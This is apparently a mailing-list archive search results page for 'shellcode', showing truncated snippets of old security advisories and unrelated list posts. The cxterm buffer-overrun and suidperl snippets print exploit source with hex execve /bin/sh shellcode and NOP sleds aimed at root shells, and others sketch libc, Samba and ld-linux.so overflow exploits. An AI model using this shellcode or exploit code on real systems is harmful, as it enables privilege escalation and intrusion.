search for: shellcode

Displaying 15 results from an estimated 15 matches for "shellcode".

1997 Feb 14
0
Linux NLSPATH buffer overflow (fwd)
...I hope it wasn't... I just occasionally found a vulnerability in Linux libc (actually, some of the versions seem not to be vulnerable; my Slackware 3.1 box was though). Unfortunately, I have no time for a real investigation right now, but here's the exploit anyway. Note that the shellcode is a bit different from the usual one: -- it does setuid(geteuid()) by itself; -- easier to modify (no more fixed offsets in shellcode, and the shell name can be changed, too -- the length is not fixed); -- the NULL pointer itself is passed in %edx to the execve syscall, not the pointer to NULL (it...
1997 Sep 26
3
Forwarded mail....
...not good for explain go fuck !=)) --**JOKE**-- ------------------------------------------------------------------------------ patch ?? WHAT U WANNA A PATCH ??? :)))) ------------------------------------------------------------------------------ [SO..] we search the shellcode of other system (SUNos , solaris, etc) and specially SCO ! ------------------------------------------------------------------------------ usage: first you must have a special smbclient for send a large large passwd how ?? tell me for the bin of get the source of samba and change in smb.h at line 24...
1997 May 14
4
cxterm buffer overrun
...mzhang@softcom.net */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int arg...
1997 Nov 13
0
another buffer overrun in sperl5.003
...;AAAA" The variable called top_env has been overwritten. In fact, it is jmp_buf and Perl calls longjmp() with it somewhere in my_exit(). Run this and wait for a root prompt: [exploit code] #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn't it wonderful? :) $| = 1; $shellcode = "\x90" x 512 . # nops "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\...
2015 Feb 04
5
Another Fedora decision
...ow already has root privileges. They don't need to crack your > passwords now. You're already boned. Not exactly. There have been remotely exploitable vulnerabilities where an arbitrary file could be read (not written), but otherwise root access wasn't given by the exploit; that is, no shellcode per se. If you can somehow (buffer overflow shellcode or something similar) get, say, httpd to return a copy of /etc/shadow in a GET request, well, you don't have root, but you do have the hashed passwords. It doesn't take an interactive root session, and may not even leave a trace of...
2004 Mar 12
1
bin/64150: [PATCH] ls(1) coredumps when started via execve(2) with no argv.
On Fri, Mar 12, 2004 at 11:57:30AM +0100, Morten Rodal wrote: > On Fri, Mar 12, 2004 at 12:49:14PM +0200, Ruslan Ermilov wrote: > > On Fri, Mar 12, 2004 at 10:22:00AM +0100, Morten Rodal wrote: > > > >Description: > > > ls(1) calls the fts(3) functions for traversing a file hierarchy. > > > If ls(1) is executed via execve(2) system call with a NULL argv >
2015 Feb 04
0
Another Fedora decision
...hey don't need to crack your passwords now. >> You're already boned. > > > Not exactly. > > There have been remotely exploitable vulnerabilities where an arbitrary file > could be read (not written), but otherwise root access wasn't given by the > exploit; that is, no shellcode per se. If you can somehow (buffer overflow > shellcode or something similar) get, say, httpd to return a copy of > /etc/shadow in a GET request, well, you don't have root, but you do have the > hashed passwords. It doesn't take an interactive root session, and may not > even l...
2003 Aug 28
0
[louisk@bend.com: snort, postgres, bridge]
...t 8081, set your # HTTP_PORTS variable like this: # # var HTTP_PORTS 8010 # # Port lists must either be continuous [eg 80:8080], or a single port [eg 80]. # We will adding support for a real list of ports in the future. # Ports you run web servers on var HTTP_PORTS 80 # Ports you want to look for SHELLCODE on. var SHELLCODE_PORTS !80 # Ports you do oracle attacks on var ORACLE_PORTS 1521 # other variables # # AIM servers. AOL has a habit of adding new AIM servers, so instead of # modifying the signatures when they do, we add them to this list of # servers. var AIM_SERVERS [64.12.24.0/24,64.12.25.0...
2010 Sep 16
3
potentially dangerous R functions via the web?
Hello: For the development of the new Tiki PluginR (to be able to run R scripts from Tiki: in Wiki pages, web spreadsheets, etc., http://dev.tiki.org/PluginR ), for now we are using the list of functions that were used in the r-php project, and which were inherited by the R extension for MediaWiki. Since r-php was written some years ago (2006), I wonder whether anyone knows if there are
1998 Feb 04
0
An old ld-linux.so hole
...executing. It devours all remaining file table entries and goes to sleep. Another context switch and /usr/bin/passwd (formerly known as spawn.c ) executes. Dynamic linker cannot open /lib/libc.so.5 ( error: file table full ), cooks an error message, and an overflow occurs. Great. However, a standard shellcode is of no use in this case: we can't exec anything ( there are still no file table entries free ! ). Instead of giving up after the first unsuccessful exec, the shellcode should first kill one of the eat_desc processes, and then in a loop infinitely try to execute the program we wish to. This scenario i...
2008 Apr 24
4
Pure Ruby HTTP parser
Before anything else, let me state this: Of course it's going to be PAINFULLY slow on MRI. That's not the point :) I thought I'd try out writing out a Ruby version of the parser for the purposes of Rubinius. For those of you who aren't aware, Ragel supports a goto-driven FSM on Rubinius by injecting assembly directly, and Rubinius head honcho guy Evan Phoenix
2012 Nov 28
3
CentOS version for sparc
Hello there, I'd like to have an iso image version for UltraSPARC 64-bit. Recently, I downloaded the CentOS version 4.2 beta iso image and installed it on a Sun Ultra SPARC 64-bit machine. It hung when it went to the screen " the CentOS 4.2 beta screen, <Tab>/<Alt tab> | <Space> selects | <F12> next screen ". Any idea? Please help. Thanks in advance. Amy on your
2011 Feb 18
5
Bind Problem or Update SSL?
> From: Larry Vaden <vaden at texoma.net> > Date: Sun, Jan 23, 2011 at 8:03 PM > Subject: sources of bind-9.7.2-P3 rpms for Centos 4.8 and 5.5? > Our site running Centos 4.8 and 5.5 name servers was hacked with > the result that www.yahoo.com is now within our /19 and causing > some grief. Don't understand what you mean by 'within our /19'. Have your IP
1998 Aug 25
1
Named Overflow Concern - SUMMARY (fwd)
George Brown sent this to my private Email address instead of to the list. Because I forwarded it, my address is in the header. Roger. ----- Forwarded message from root ----- >From root@bull.bullnet.co.uk Mon Aug 24 16:20:29 1998 Received: from dutepp0.et.tudelft.nl by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff) for <wolff@localhost> (single-drop); Mon Aug 24
1999 Nov 12
1
[RHSA-1999:054-01] Security problems in bind (fwd)
Woops... this didn't show up here but it did on BugTraq. Questions answered! -- Chuck Mead, CTO, MoonGroup Consulting, Inc. <http://moongroup.com> Mail problems? Send "s-u-b-s-c-r-i-b-e mailhelp" (no quotes and no hyphens) in the body of a message to mailhelp-request@moongroup.com. Public key available at: wwwkeys.us.pgp.net ----------